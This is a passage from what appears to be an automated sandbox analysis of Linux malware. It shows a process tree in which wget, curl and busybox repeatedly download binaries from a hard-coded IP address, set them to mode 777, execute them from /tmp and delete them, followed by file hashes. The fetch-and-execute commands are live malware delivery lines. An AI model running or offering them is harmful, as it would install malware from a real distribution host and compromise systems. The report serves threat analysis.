/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:1646
-
-
/bin/chmodchmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:1652
-
-
/bin/chmodchmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:1658
-
-
/bin/chmodchmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:1664
-
-
/bin/chmodchmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:1670
-
-
/bin/chmodchmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:1673
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97